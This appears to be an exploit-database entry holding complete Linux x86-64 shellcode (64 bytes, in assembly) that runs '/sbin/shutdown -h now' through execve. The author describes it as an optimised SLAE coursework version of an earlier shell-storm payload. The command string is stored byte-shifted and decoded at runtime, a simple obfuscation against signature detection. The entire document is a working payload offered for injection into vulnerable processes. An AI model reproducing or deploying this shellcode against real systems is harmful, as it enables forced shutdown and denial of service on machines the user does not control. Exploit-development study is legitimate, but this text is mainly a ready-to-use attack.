Linux/x64 - /sbin/shutdown -h now Shellcode (64 bytes)

Author: Keyman
type: 
platform: linux_x86-64
port: 64.0
date_added: 2018-01-15 
date_updated: 2018-01-15 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

; ===================================================================
; Optimized version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-877.php
; Author: SLAE64-1351 (Keyman)
; Date: 14/09/2014
;
; Length: 64 bytes (got shorter by 1 byte :D )
;
; What's new is that some optimalization was performed on the
; original code which left some space to do a basic decoding of the
; command (/sbin/shutdown). Each byte (except the first one) was
; decremented by 1. The decoder just adds 1 to each byte.
;
; ===================================================================

section .text
global _start

_start:

xor rax, rax                ; clear rax and rdx
cdq

; -------------------------------------------------------------------
; 1. store '-h' on stack
; -------------------------------------------------------------------

push rax
push word 0x682d ;-h
push rsp
pop rcx

; -------------------------------------------------------------------
; 2. store 'now' on stack
; -------------------------------------------------------------------

push rax
push byte 0x77
push word 0x6f6e ; now
push rsp
pop rbx

push rax
push rbx
push rcx

; -------------------------------------------------------------------
; 3. store '/sbin/shutdown' on stack
; -------------------------------------------------------------------

push rsp
pop rsi

push rax
jmp shutdown
cont:
pop rdi

push 15
pop rcx

do_add:
    add byte [rdi+rcx], 0x01
    loop do_add

push 59
pop rax
syscall

shutdown:
    call cont
    c_1: db 0x2f, 0x2e, 0x2e, 0x72, 0x61, 0x68, 0x6d, 0x2e, 0x72, 0x67, 0x74, 0x73, 0x63, 0x6e, 0x76, 0x6d